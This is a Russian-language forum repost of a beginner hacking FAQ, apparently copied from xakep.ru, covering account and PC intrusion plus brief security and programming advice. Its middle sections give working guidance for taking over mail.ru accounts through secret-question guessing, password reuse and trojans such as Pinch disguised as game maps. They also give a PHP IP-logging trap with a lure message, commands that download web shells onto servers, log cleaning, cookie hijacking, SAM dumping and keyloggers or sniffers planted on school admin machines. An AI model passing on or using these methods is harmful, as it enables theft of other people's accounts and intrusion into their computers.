
Но если все можно найти, зачем же тогда хацкерские форумы?

Во-первых, форум - это сообщество, люди, объединенные общими интересами. Они обсуждают все, начиная от погоды и заканчивая интересными взломами, но это не значит, что они с радостью будут разбираться с твоей проблемой.

Во-вторых, вспомни еще разок про 90%. Остается 10% вопросов, ответов на которые действительно пока нет в поисковиках, либо они так хорошо запрятаны, что ни за что не отыскать. Что ж, тогда у тебя есть все шансы задать свой вопрос первым. Раз он еще не встречался, скорей всего твои потомки, столкнувшиеся с такой же проблемой, будут попадать именно на твою тему. Поэтому постарайся задать его правильно.

Как же спросить правильно?

Замечательная статья про то, как задавать вопросы: http://ln.com.ua/~openxs/articles/smart … s-ru.html. Постарайся прочитать хотя бы ключевые моменты, это сильно повысит шанс, что тебе ответят и помогут.

Блин, а я вот спросил на форуме Античата, но мне не ответили даже через неделю. Да они там сами ничего не знают!!!

Значит, ты так и не прочитал эту замечательную статью: http://ln.com.ua/~openxs/articles/smart … s-ru.html. Потрать 10-15 минут, чтобы потом не терять дни… Поверь, оно стоит того.

Если же у тебя не получается даже это, давай не будем становиться хакерами, ок? :)

Какие самые популярные сайты по взлому?

Вот некоторые из них:

http://antichat.ru
http://web-hack.ru
http://hackzona.ru
http://nsd.ru
http://void.ru
http://security.nnov.ru
http://anonymous.ru
http://inattack.ru
http://emanual.ru
http://sources.ru
http://codenet.ru

Кроме того, вот очень полезный сайт с доками по программированию: doks.gorodok.net

В Сети действительно много информации для новичков, но там столько терминов! Что такое сплойт, прокси, IP, дефейс и т.п.?

Во-первых, многие непонятные слова можно узнать тут: http://www.xakep.ru/magazine/xa/049/024/1.asp.

Кроме того, есть один универсальный способ: открываем yandex.ru и пишем там: "Что такое прокси". Кстати, ты сможешь познакомиться с зачатками искусственного интеллекта этого поисковика, увидев, как он преобразует твой запрос в «прокси – это…». Поэтому не стесняйся задавать ему вопросы типа «что такое …», он все знает. Пусть это будет наш секрет :)

Какими необходимыми знаниями нужно обладать, чтобы стать хакером?

Во-первых, нужно здорово разбираться хотя бы в одной из операционных систем: Windows либо *nix.
Знать хотя бы основные shell-команды, причем как Windows, так и *nix.
Очень желательно знание одного из интерпретируемых языков, лучше всего PHP или perl.
Без знаний HTML, JavaScript, CSS придется очень туго.
Весьма пригодится умение писать Windows-программки. Соответственно, это C/C++, Delphi или Visual Basic.
Умение быстро находить интересующую тебя информацию в поисковиках будет несомненным плюсом.
Знание принципов функционирования компьютера, сетей и Интернета в целом.

Конечно, все это не охватить сразу, начни с чего-нибудь одного и осваивай постепенно. Со временем поймешь сам, что пригодится, а что нет.

Я слышал, что все хакеры не пользуются Windows это правда?

Не совсем. Дело в том, что большинство серверов - это unix-системы. Именно поэтому чем лучше ты будешь знать никсы, тем больше тебе будет «везти» во взломах. А самый лучший способ узнать систему – поставить ее себе на комп. Кроме того, Unix очень привлекателен эффективной работой с сетью. Некоторые технологии, успешно реализованные в никсах, Windows даже не поддерживает, в то время как отдельные программы вроде Corel Draw пока не имеют аналогов в *nix. Так что в какой ОС работать, это, в принципе, кому как удобней. Если есть желание познакомиться с каким-нибудь никсом, но не хочешь расставаться с Windows, то можешь оставить ее и поставить Linux как дополнительную ОС. Если заинтересовался, тебе прямая дорога на http://www.cnews.ru/reviews/articles/in … 30/188154.

to be continued...

0

9

Так, граждане юзвери, продолжаем разбирать FAQ для тех, кто решил стать ШурСтраКосом-кулхацкером =). ЧаВо скопированы с xakep.ru. На десятом вопросе мне надоело исправлять ашибки и очепятки, а также добавлять отсебятину, так что читайте, как есть. ;). Успехов.

FAQ по взлому в Cети

Как взломать мыло на mail.ru и yandex.ru?

Наверное, я тебя разочарую, но почту mail.ru или yandex.ru взломать нельзя. Почему?

http://mail.ru, пожалуй, самая популярная почтовая система. Администрация серверов mail.ru имеет огромные доходы с рекламы, они завлекают пользователей рекламой в печатных изданиях и по телевидению, и неужели ты думаешь, они пожалеют денег на хороших специалистов по безопасности? Забудь об этом. И, самое главное, никогда не ведись на предложения «взломать любое мыло на mail.ru за $5» - тебя самым наглым образом кинут. Способов дурачить лохов куча. Самый распространенный – «найден секретный почтовый робот, сообщающий пароль от любого ящика, если прислать ему свой пароль», также предлагают различные проги для взлома ящика «100% работающие и всего за $25».

Однако стоп, не все так печально. Что? Я говорю, почту на mail.ru нельзя взломать? Шутка :)

Если нельзя найти баг в самом сервере, почему бы не найти его в голове владельца ящика? Итак, внимание, самые распространенные способы взлома почты на mail.ru. Само собой, они катят и для других почтовиков.

Что ж, приступим.

1. Первым делом стоит попробовать подобрать ответ на секретный вопрос. Вероятность мала, но попробовать стоит. К примеру, ответом на "любимое блюдо" чаще всего бывают "шашлык" или "пельмени".

2. Допустим, мыло vasya-pupkin@mail.ru. Ищешь в поисковиках (достаточно Яндекс, Гугл и Рамблер) все сайты, где он засветился, выписываешь все ники, под которыми он гуляет по Сети, и все сайты, на которых он зарегистрирован под этими никами. Конечно, если логин типа alex, то ничего не выйдет, нужен уникальный.

После этого исследуешь все найденные сайты. Если человек давно существует в Сети, более чем вероятно, что год-другой назад он зарегился со своим паролем на каком-нибудь superforum2.h14.ru, взломать который не составит большого труда. Пароль от аккаунта на форуме часто совпадает с паролем от мыла.

3. Отсылаем человеку троянца в надежде, что он ламер ушастый и клюнет на superFoto.jpg.............exe. Отослать можно запароленный архив csmaps.zip от имени его друга, сказав, что там новая крутая карта CS. Пароль указать в письме. Как правило, юзеры проверяют запароленный архив антивирем, а потом без палева открывают его и запускают exe-шник . Для этих целей вполне подойдет троян Pinch.

4. Допустим, ничего не помогло. Человек следит за мылом, меняет пароли и т.д.

Не все потеряно. Снова идем на страницу вспоминания пароля mail.ru и ищем, нет ли там ретрива пасса на мыло. Есть? Тогда можно попытаться узнать второе мыло и повторить всю процедурку сначала. Возможно, его человек охраняет не так ревностно.

Как взломать мыло на менее защищенных почтовиках: newmail, hotmail…?

1. Приятней всего найти багу самому, например, уязвимость в веб-интерфейсе: возможно, где-нибудь спряталась XSS или даже SQL-inj.

2. Если админы до сих пор не почесались сделать защиту от брута, можно попытаться сбрутить пароль. Для этого есть тулзы, например, старый добрый Brutus AET под Windows, либо THC-Hydra под никсы.

3. Использовать методы социнженерии, описанные для mail.ru.

Как взломать сервер ***? Вы же можете помочь?

Каждый взлом – процесс творческий. И каждый ломает так, как ему нравится. Но в первую очередь, конечно, стоит досконально изучить «подопытный» сервер. Какая на нем стоит система, какие сервисы, следит ли админ за патчами и обновлениями и т.д. При достаточном опыте хакер может узнать все это имея лишь браузер и telnet-клиент, начинающему же проще всего воспользоваться сканером уязвимостей. Например, SSS-сканером под Windows, или nmap под *nix.

Сканер нашел уязвимость и радостно сообщил об этом? Не торопись мчаться в скайп ШурСтраКосов с вопросом «nmap выдал мне ***, что с этим делать» - тебя скорей всего пошлют. Вбей ключевые слова из фразы об уязвимости в поисковик (лучше google).

Если же на сервере стоит старая бажная версия одного из сервисов, пробуй найти под нее сплойты.

Как пользоваться сплойтами?

Очень просто. Запустить сплойт с нужными параметрами, а он все сделает за тебя. Проблема в том, что большинство сплойтов в открытом доступе только в исходниках, то есть, обычный *.txt-файл с кодом на C++ или perl. Если это C++, то сплойт придется предварительно скомпилировать. Сплойты на perl или php компилировать не надо, они исполняются прямо на сервере. Если у тебя есть shell, достаточно залить туда файл и запустить. Если ничего кроме твоей родной Windows у тебя нет, придется скачать и установить один из эмуляторов. Например, cygwin и activePerl. Можно, в принципе, воспользоваться денвером (denwer.ru), но тогда тебе, скорей всего, придется вручную добавить некоторые сетевые библиотеки, которые отсутствуют в конфигурации по умолчанию.

Помни, что большинство сплойтов в исходниках имеют «защиту от дурака», то есть специально сделанные синтаксические ошибки, поэтому если в программировании ты абсолютный ноль, придется искать уже исправленный рабочий сплойт.

Как скомпилировать сплойт под Windows?

Ну очень подробное руководство приведено тут: http://www.razrushitel.front.ru/complite.html

Как запустить сплойт под Windows?

Нажми WinKey + R (или Пуск -> выполнить), там cmd и нажми ENTER. Появится черное окошко, в котором и надо запустить твой сплойт. Передвигаться по директориям можно командой "CD имя директории", перейти с диска C: на диск D: можно командой CD /D D:
Список всех файлов и папок можно получить командой DIR. Другие команды узнаешь, набрав HELP.


Как запустить сплойт на шелле? У меня не получается.

Как правило, справка по использованию сплойта выдается при запуске его без параметров или с параметрами –-help или -h.

Как взломать сайт?

Может быть, ты будешь расстроен, но нет ни чудо-проги lomalka_saitov.exe, ни заклинания «сайт, взломайся», ни слова, которое нужно ввести на сайте, чтобы он взломался. Даже сам Аль-Асвад не владеет Сферой Сайтоломания, несмотря на всю свою манч-крутость.

Опыт, знания и упорство – вот три кита, на которых держатся самые успешные взломы. Почитай описания уже совершенных взломов, которых в Сети просто до кучи, там все подробно описывается. Прочти 5-10 таких описаний, и получишь представление о том, как взломать сайт. Хотя бы примерно ;)

Могу лишь дать несколько рекомендаций:

    * Очень важно, на каком сервере находится сайт-цель. Возможно, админ не следит за сервером и вовремя не патчит систему. Тебе надо быть в курсе всех последних уязвимостей, чтобы сразу это заметить. Узнать информацию о сервере можно, например, на wwwwhois-service.ru.
    * Если это сервер крупной хостинг-компании, вроде valuehost, будь уверен - взломать сервер не получится, и натравливать сканер в надежде найти бажный сервис практически не имеет смысла. В этом случае разумней всего начать с поиска багов на самом сайте - возможно ошибку допустили программисты.
    * Начни с поиска установленных «сторонних» скриптов: форумов, чатов, гостевых и т.п. А может быть и сам сайт – это какой-нибудь публичный веб-портал вроде php-nuke. Тогда остается лишь узнать версию скрипта и проверить, не найдена ли в нем какая уязвимость.

Неплохая статья про взлом вебсайтов: wwwhackzona.ru/hz.php?name=News&file=article&sid=2045

Какие уязвимости чаще всего встречаются на сайтах?

Основные уязвимости - это, несомненно:

1. SQL-инъекции (SQL-injection).

SQL-инъекция относится к вставке метасимволов SQL в вводимые пользователем данные, что приводит к изменению запроса базе данных. Как правило, взломщики для начала определяют уязвимость сайта к такой атаке (для этого в форму или в один из параметров url посылается знак одинарной кавычки). Последствия выполнения такой атаки на уязвимом сайте могут находиться в пределах от появления детального сообщения об ошибке, что раскрывает злоумышленнику используемую на сайте технологию, до доступа к закрытым областям сайта или выполнения на сервере произвольных команд операционной системы.

2. Межсайтовый скриптинг (XSS).

Принцип работы межсайтового скриптинга основан на внедрении злонамеренного кода в HTML код страницы, что приводит к выполнению такого кода на машине жертвы, то есть броузером. Чаще всего применяется в гостевых книгах, чатах и форумах.

Также XSS представляет опасность, если произвольный код отображается на страницах с расширением shtml, т.е. сервер поддерживает технологию SSI (Server Side Includes). Это может привести к чтению или выполнению произвольных файлов на сервере.

3. Прочие баги в головах программистов ;)

Ошибки в самом сайте, из-за которых на сайте могут появиться серьезные бреши в безопасности. Например, адрес сайта содержит что-нибудь вроде «?file=», допустим site.ru?show.php&article=../index.asp, но, само собой, это лишь один из вариантов.

Как взломать ICQ?

Неплохой FAQ по ICQ-хакингу для начинающих приведен здесь:

http://www.web-hack.ru/articles/articles.php?go=13

Как узнать ip сервера, например yandex.ru?

Самый быстрый способ – набрать в командной строке «ping yandex.ru»

Ты увидишь что-нибудь вроде

64 bytes from 213.180.204.11: icmp_seq=0 ttl=41 time=60.988 ms

213.180.204.11 – это и есть ip-адрес сервера.

Как узнать ip юзера в сети?

1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.

Кроме того, на сайте wwwleader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.

2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.

3. Узнать на каких irc-каналах сидит юзер и посмотреть там.

4. Если ничего не помогает, но очень хочется, не отчаивайся.

Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

Код:
<?
  $message = "Date: " . 
  date("d.m.Y H:i:s") . 
  "\nIP: " . $REMOTE_ADDR . 
  "\nServer: " . 
  gethostbyaddr($REMOTE_ADDR) . 
  "\nHTTP_X_FORWARDED_FOR: " . 
  $HTTP_X_FORWARDED_FOR . 
  "\nPage: " . 
  $SERVER_NAME . 
  $REQUEST_URI . 
  "\nQuery: " . 
  $QUERY_STRING . 
  "\nComing from: " . 
  $HTTP_REFERER . 
  "\nBrowser: " . 
  $HTTP_USER_AGENT . 
  "\nFilename: " . 
  $SCRIPT_FILENAME;
  mail("admin@mail.ru", 
  "Requested ip", $message, 
  "From: admin@mail.ru\nContent-Type: text/plain; charset=windows-1251", 
  "-fadmin@mail.ru");
  $ = fopen("log.txt", "a");
  fwrite($fp, str_replace("\n", "\t", $message) . "\n");
  fclose($fp); 
  include("fil.html");
?>

Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.

Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).

Действует 100% :)

Я знаю ip компьютера/юзера, как его взломать?

IP – это уникальный адрес компьютера. Так же как для рассылки корреспонденции у каждого жителя планеты должен быть уникальный домашний адрес (Страна, город, улица, дом, квартира), каждый компьютер должен иметь свой уникальный ip-адрес, чтобы другие компьютеры в сети смогли передать ему информацию.

Поэтому твой вопрос равносилен вопросу «как взломать квартиру друга, если я знаю его домашний адрес».

Надеюсь, ты понимаешь, что просто знание ip недостаточно.

Подробнее про ip-адрес, можно прочитать тут: http://www.sluh.freenet.kz/p8/12.html.

Как скрыть свой ip?

Если ты хочешь скрыть, т.е. поменять свой IP, то самый простой способ это сделать – воспользоваться анонимными прокси. Однако, не все так просто.

Обычно при обращении к сайту веб-серверу передаются два IP-адреса: REMOTE_ADDRESS и HTTP_X_FORWARDED_FOR.

REMOTE_ADDRESS – это, и есть твой ip-шник: по которому банят, который видят админы и т.п.

HTTP_X_FORWARDED_FOR - это дополнительный параметр, в котором хранится твой реальный IP. Например, если ты в локальной сетке, тут будет твой внутренний адрес.

Имей ввиду, что даже если если ты ходишь в сеть через прокси, и твой IP сменился на IP проксика, в HTTP_X_FORWARDED_FOR по-прежнему будет светиться твой старый IP!

Поэтому для полной анонимности нужно выбирать только те прокси, которые помечены как high anonymous или elite proxy. Эти сервера не передают никакой информации о твоем старом IP и полностью конфиденциальны. Если, конечно, это не сервера агентов спецслужб ;)

Как не спалиться при взломе?

Лазить по сети только через анонимные прокси, чтобы не светить свой ip. Заметать следы… Для этого используй какой-нибудь логклинер типа vanish2.

Где взять анонимные прокси и что с ними делать?

Списки анонимных прокси:

wwwsamair.ru/proxy
wwwweb-hack.ru/proxy
wwwfreeproxy.ru/ru
wwwproxy4free.com
wwwanonymizer.com
wwwanonymizer.ru

Пара прокси-чекеров:

wwwchecker.freeproxy.ru/checker/
wwwsamair.ru/proxy/proxychecker/

Юзаем прокси так:

Опера: Инструменты -> Настройки (или сразу Ctrl+F12) -> Сеть -> Прокси-серверы. Пишем тут ip адрес и порт проксика, нажимаем OK. далее нажимаем F12 и ставим галочку около Enable Proxy Servers
IE: Сервис -> Свойства обозревателя -> Подключения->Настройка LAN
Если через проксик нужно пустить весь трафик, либо программу, которая не поддерживает настройку прокси-соединения (например, TheBat!), пользуйся SocksChain.

Что делать с паролем такого вида: d8578edf8458ce06fbc5bb76a58c5ca4?

Ну, во-первых, это не пароль, а md5-хеш от пароля. Расшифровать его проще всего прогой md5Inside, или ее более продвинутым вариантом PasswordsPro. Есть также консольная программка JohnTheRipper (JTR)

Как юзать JohnTheRipper (JTR)?

wwwinattack.ru/search.php?s=john

Как юзать nmap?

wwwinattack.ru/article/48

Как мне закачать что-нибудь на сервер?

lynx: lynx -source "yoursite.com/shells/shell.php" > shell.php

links: аналогично lynx

wget: wget -O shell.php yoursite.com/shells/shell.php

GET: GET yoursite.com/shells/shell.php > shell.php

fetch: fetch -o shell.php yoursite.com/shells/shell.php

curl: curl --output shell.php yoursite.com/shells/shell.php

Мне удалось стянуть cookies с чужого компа, что с ними теперь делать?

Ну, во-первых, не радуйся слишком – куки не настолько конфиденциальная информация, как, к примеру, пароль от почты или от инета. Но кое-что, все же сделать можно.

Дело в том, что на некоторых серверах есть механизм авторизации пользователя на длительный срок, и информация об этой авторизации хранится именно в cookies. Ты можешь сделать следующий финт ушами: просто подменить свои куки куками юзера и, если программисты не предусмотрели такую подлянку, запросто войти под чужим логином, сайт тебя сам опознает.

Чаще всего такие фишки катят на форумах, но не на всех.

Это не проканает, если:

    * срок авторизации уже закончился
    * есть привязка к ip-адресу
    * в cookies вообще не хранится конфиденциальная информация

Но перед тем, как производить все эти манипуляции, обязательно просмотри, что же, собственно, есть в куках – возможно, там пароль в открытом виде, или же хеш пароля. Тогда, даже если истек срок действия cookies, есть шанс его расшифровать и зайти под чужим логином. В Опере cookies можно просматривать и редактировать через меню Настройки -> Дополнительно -> cookies.

Если у тебя IE, то есть Internet Explorer, придется воспользоваться дополнительными средствами, например программой IECookiesView.
FAQ по Windows и взлому ПК

Я запускаю консольную программу, появляется черное окошко и исчезает. Что не так?

Сначала надо запустить командную строку Winodws: WinKey + R (или Пуск-> Выполнить), там набери cmd и затем ENTER. Появится черное окошко, куда и надо вводить команды.

Я знаю команду net send. А есть еще какие-нибудь интересные команды?

Список основных команд Windows можно получить, набрав HELP в командной строке. Справка по конкретной команде вызывается так: HELP <имя команды>. Например, HELP LABEL.

Наиболее полезные команды:

CMD
Запуск командной строки ;)

NET SEND
отправка сообщения другому компьютеру в сети

NET START/STOP
запуск/остановка служб

NETSTAT
вывод активных подключений

NET USER username /ADD
заведение нового пользователя

NET USER username newpassword
смена пароля пользователя username

NET LOCALGROUP Администраторы
вывод всех Администраторов в системе

NET LOCALGROUP Администраторы username /ADD
добавление юзера username в группу Администраторов

LABEL
смена метки диска

PING xakep.ru
проверка доступности хоста и времени его отклика

TRACERT xakep.ru
путь прохождения пакетов в Сети и время отклика каждого сервера

IPCONFIG /ALL
сетевые настройки – IP адрес, DNS, WINS и DHCP сервера и прочее

IPCONFIG /FLUSHDNS
очистка локального DNS-кэша

TASKLIST
вывод всех запущенных процессов

TASKKILL /F /IM notepad.exe
убьет процесс notepad.exe

SHUTDOWN –S
выключение компьютера

SHUTDOWN –R –T 10
перезагрузка через 10 секунд

SHUTDOWN –A
отмена остановки системы (при перезагрузке, выключении и т.п.)

FTP
запуск консольного FTP-клиента

TELNET xakep.ru 80
подключение к 80 порту сервера xakep.ru

Как посмотреть, какие порты у меня открыты?

В командной строке выполнить netstat –a

Как в Windows закрыть определенный порт?

Что такое открытый порт? Это просто ожидание соединения. Если какая-либо программа или сервис ждет входящее подключение на какой-нибудь порт, ты видишь, что этот порт «открыт». Поэтому никакого встронного «рубильника» в Windows, естественно, нет, потому что непонятно, что, собственно, закрывать. Единственный способ прикрыть порт – оборвать соединение и закрыть сокет. Вполне логично, что сделать это можно двумя способами – вырубить соответствующий сервис или программу, либо воспользоваться файрволлом.

У меня в системе куча открытых портов. Это троянцы?

Не исключено, хотя Windows открывает много портов в служебных целях.

Посмотреть, к каким службам Windows относятся определенные порты, можно тут:

http://spy.h12.ru/hack.php?ports

Как взломать ZIP / RAR / SFX архив?

Работу алгоритма, который применяется в RAR и ZIP архивах, в двух словах можно описать так: содержание архива перемешивается с использованием определенного ключа (т.е. пароля). Поэтому даже зная сам алгоритм, но не имея ключа, расшифровать данные невозможно. Так же, как в уравнении 100 – X = Y получить Y, не зная X нельзя, не смотря на то, что алгоритм вычитания одного числа из другого тривиален.

Единственный способ – перебирать все возможные ключи по очереди и смотреть, подходит он к архиву, или нет.

Надо заметить, что шифрующая функция довольно навороченная, особенно в RAR-архивах, поэтому перебор происходит ужасно медленно, даже по сравнению с MD5.

Поэтому подобрать 6-изначный и более пароль к RAR-архиву уже практически нереально в домашних условиях, это займет месяцы и годы. Однако здесь могут реально помочь большие словари для брута. Возможно, там пароль «administrator», который, конечно же, есть в любом словаре :)

Наиболее популярные программы для взлома архивов:

Advanced ZIP Password Recovery (ZIP)
Rar Password Recovery (RAR)

Как взломать пароль на BIOS?

Если ты случайно забыл пароль на BIOS от своего компьютера, или от компьютера соседа, есть куча способов исправить это недоразумение. Узнать о них можешь тут:

wahack.org.ru/chd/?sec=lib&ver=html&p=2&text=26
wwwfssr.ru/hz.php?name=News&file=article&sid=4222

Где в Windows хранятся пароли юзеров?

В Windows 98 пароли хранятся в C:\Windows\***.pwl, где вместо *** - имя пользователя.

Расшифровать их можно программой RePWL.

В Windows NT/2000/XP пароли находятся в файле SAM:

C:\Windows\System32\config\SAM. Доступ к файлу имеет только Windows, поэтому даже находясь под Администратором, скопировать этот файл не выйдет – необходимо грузиться с DOS-дискетки, или другой ОС.

Для брута учеток используется SamInside, или ее более новая версия – InsidePro. Кстати, эта программа позволяет вытащить данные SAM файла непосредственно из системы, если у вас есть права администратора.

Для подбора паролей, скорей всего, помимо SAM файла понадобится еще и System.

Как узнать пароли или повысить права с гостя до админа в Windows XP?

1. У тебя есть права администратора

1.1. Запускаешь InsidePro, там в меню есть опция «импорт учеток с локальной машины» - получаешь хеши всех юзеров, осталось только расшифровать.

1.2. Меняешь любой пароль из командной строки:

NET USER username password /ADD
заведение юзера username с паролем password

NET USER username newpassword
смена пароля пользователя username на newpassword

NET LOCALGROUP Администраторы
вывод всех Администраторов в системе

NET LOCALGROUP Администраторы username /ADD
добавление юзера username в группу Администраторов

2. У тебя нет прав администратора, но есть физический доступ к компьютеру.

2.0 Во-первых, убедись, что у тебя из действительно нет: загрузись в Safe Mode (жми F8 при загрузке) и попробуй зайти под учеткой «Администратор». Очень часто на нее ставят пустой пароль, или что-нибудь вроде «a», «123», или «qwerty»

2.1 Если и правда нет, тогда грузись с DOS-дискетки, флешки, или загрузочного диска, забирай SAM и бруть его с помощью InsidePro.

2.2 Ищи локальный сплоит для повышения прав, и опять же становись админом.

2.3 Есть целый набор утилит для восстановления системы. Лучшая из них называется ERD Commander. ERD Commander 2005 можно скачать в p2p, найти его в Интернете проблематично. Поэтому могу предложить бесплатную альтернативу, всего несколько Мб. Там все подробно описано, как юзать и т.п. Программа представляет собой загрузочный диск, или дискетку, которые просто обнуляют пароль администратора. Достаточно вставить такой диск в дисковод и перезагрузить компьютер.

3. У тебя нет постоянного доступа к машине и/или нет возможности использовать все вышеперечисленные способы.

3.1 Запускай на компе кейлоггер, или вирус, который сможет стащить пароль, и зови админа «установить игрушку»

3.2 Используй сниффер для перехвата админского пароля - самый проверенный способ для школ и информационных классов: заходишь в биос, ставишь загрузку с флопика, грузишься с загрузочной дискеты. Затем кидаешь в папку автозагрузки админа прогу fucklogon, которая методом перехвата winapi снифает все пароли в лог файл... Ждёшь пару дней и читаешь логи, за два дня админ полюбой засветит свой пароль.

3.3 Попробуй проверить, как там с шарами: Набери в командной строке \\work10\C$, где work10 – имя машины в сети. Возможно, получится поиметь доступ к С-диску, а там уже проще – скажем, прописать что-нибудь в autoexec.bat, или в автозапуск и дождаться, пока винду перезагрузят.

Есть ли эмуляторы UNIX систем под Windows?

Конечно, есть. Для компиляции программ, или просто для знакомства с unix shell подойдет cygwin. Если под Windows хочется иметь полноценную UNIX-систему, рекомендую поставить виртуальную машину VMWare – вторая ось будет грузиться прям «внутри» Windows. Вполне полноценная система, в которой не страшно сделать «что-нибудь не то» - крах гостевой операционки в VMWare никак не повлияет на работу основной Windows.

Как можно соединить компьютеры по модему без Интернета?

http://phil.philka.ru/faq/serverconection.htm

Как бесплатно звонить на межгород через Интернет?

Поговорить с любым человеком, у которого есть Интернет, можно с помощью специальных сервисов. Самый популярный подобный сервис в России – Skype. Услуга бесплатная, однако, для этого другой пользователь тоже должен быть подключен к сервису SkyPE. Для того, чтобы звонить на городской телефон, придется заплатить.

Иногда междугородние и международные звонки через Интернет можно делать бесплатно. Как - описано здесь:

http://www.xakep.ru/post/40632/default.asp

Как оптимизировать и ускорить работу Windows XP?

Отличное руководство по настройке Windows XP: http://phil.philka.ru/faq/setupxp.htm

0

10

FAQ по безопасности
ЧаВо с xakep.ru.

Мой файрвол время от времени сообщает мне об RST-атаках, или сканировании портов с сайтов, которые я посещаю. За мной кто-то следит?

RST - это не обязательно настоящая атака. Существует возможность сброса установленного TCP подключения с помощью посылки соответствующих TCP пакетов с набором флагов RST или SYN. Подробно про то, как действительно используют эту уязвимость, можно прочитать на секлабе: wwwsecuritylab.ru/analytics/216346.php.

Но это в теории. В реальности, чаще всего, это ложная тревога.

Если в двух словах, то при серфинге интернета, согласно TCP протоколу, твой компьютер посылает пакеты с какого-нибудь порта (заметь, с любого произвольного порта) на сервер, и ожидает ответа. Если ответа нет, соединение, закрывается. Но есть одно "но" - все пакеты шлются через множество серверов, и один из них, в том числе и тот сайт, к которому ты обращаешься, может просто протормозить с ответом. В итоге, когда он таки вспомнит про тебя, то пришлет пакет с этим самым флагом RST на, увы, уже закрытый порт. А любые пакеты на закрытые порты файрволл (аутпост в частности) воспринимает как попытку сканирования, о чем тебе и сообщает.

Как определить, настоящая это атака, или нет?

Посмотреть whois ip, с которого была "атака" (wwwwhois-service.ru). Если это обычный сайт, вроде yandex.ru, или xakep.ru, то имеет место быть именно та ситуация, которую я описал, скорее всего, ты сидишь за каким-нибудь тормозным прокси-сервером. Если же это какой-нибудь подозрительный сайт, на котором ты ни разу не был, или же ip вообще не имеет домена, тогда бей тревогу.

Хотя, собственно, зачем? Аутпост у тебя есть, атаки отражает. Вот если бы он сказал "Поздравляем! RST-атака Вашего компьютера успешно проведена", это было бы хуже :)

Если просто хочешь отомстить, можешь настучать провайдеру взломщиков, которого можно узнать в том же whois. Там же будет и abuse-адрес провайдера, куда следует писать о нарушениях.

Как безопасно серфить сеть?

Если вкратце, то следует установить виртуальную машину типа VM Ware, настроить виртуальную сеть (благо она это позволяет) и выходить в Сеть только через нее. Если расширенно - прочитай http://www.xakep.ru//post/36536/default.asp.
FAQ по программированию

Какие языки программирования следует изучать в первую очередь?

Важен не сам язык, а мысли, которые этим языком выражают. Практически любую алгоритмическую задачу можно решить на любом языке (за какое время и с какой эффективностью — это уже другой вопрос), поэтому неважно, с какого языка начинать, - все равно за время его изучения он успеет устареть. И следует выбирать тот язык, для изучения которого есть хорошие учебники по программированию, а так же знакомые специалисты, способные проконсультировать и помочь, если вдруг что-то пойдет не так, ведь язык — это не только способ записи алгоритма, но еще и средство общения! В этом качестве языку Си нет равных, и de facto он стал международным стандартом типа английского. Знать его нужно не только затем, чтобы на нем программировать, но и чтобы понимать листинги, приведенные в книгах, посвященных сетевым протоколам или устройству осей. Visual Basic – de facto стандарт в области макроязыков на платформе Windows, и без его знания невозможно эффективно работать с Microsoft Visual Studio. Но Basic совершенно чужд миру UNIX, где ведущую роль играют Perl, AWK и другие скриптовые языки. Если человек может решить свою задачу на языке Х, переход на другой язык для него не будет проблемой.

Стоит ли хвататься за новые технологии типа .NET или посоветуешь держаться старых?

Отечественная система образования до безобразия консервативна и крайне неохотно реагирует на новые технологические веяния и прорывы, поэтому в 99% случаев выпускник ВУЗа к реальной работе не готов и ему следует еще учиться и учиться. А все потому, что у нас традиционно учили фундаментальным основам, а вот американцы, напротив, делают упор на конкретное практическое применение. Девушки, окончившие 2-недельные курсы по Visual Basic'у, составляют определенную конкуренцию специалистам, знающим Си++, потому что они в курсе того, какие есть библиотеки и как ими пользоваться, но создать их самостоятельно не в состоянии. Все, что они могут — это сложить готовые компоненты воедино (а другого зачастую и не требуется). Алгоритмически-ориентированный программист готов запрограммировать что угодно, но... он совершенно не в курсе, какие существуют библиотеки, и не умеет с ними работать. Поэтому при решении типовых задач наиболее конкурентоспособным оказывается программист, идущий в ногу с прогрессом и осваивающий новые библиотеки и framewaork'и по мере их появления, а вот при решении нетипичных задач программисты, знающие фундаментальные основы, получают огромное преимущество. Некоторые ухитряются совмещать оба качества, но это удается лишь немногим.

Насколько важно знать ассемблер?

Несмотря на то, что ассемблер сдает свои позиции, профессиональному программисту знать его необходимо, хотя бы затем, чтобы разбирать аварийные дампы и правильно интерпретировать сообщения о критических ошибках. Не говоря уже о том, что создание эффективного кода без знания архитектуры процессора (и всего компьютера в целом) — невозможно. Знание ассемблера позволяет заглянуть внутрь откомпилированной программы и понять, почему она ведет себя не так, как этого хочется тебе. Операционная система перестает быть черным ящиком, а отсутствие исходных текстов Windows уже не становится преградой в археологических раскопках ее недр. Аргументы в пользу ассемблера можно перечислять бесконечно, и как бы современные языки ни абстрагировались от железа, в жизни каждого программиста периодически возникает жгучая необходимость написать пару ассемблерных строк или понять, что означают уже написанные.

Как устроиться на хорошую работу в России и за рубежом?

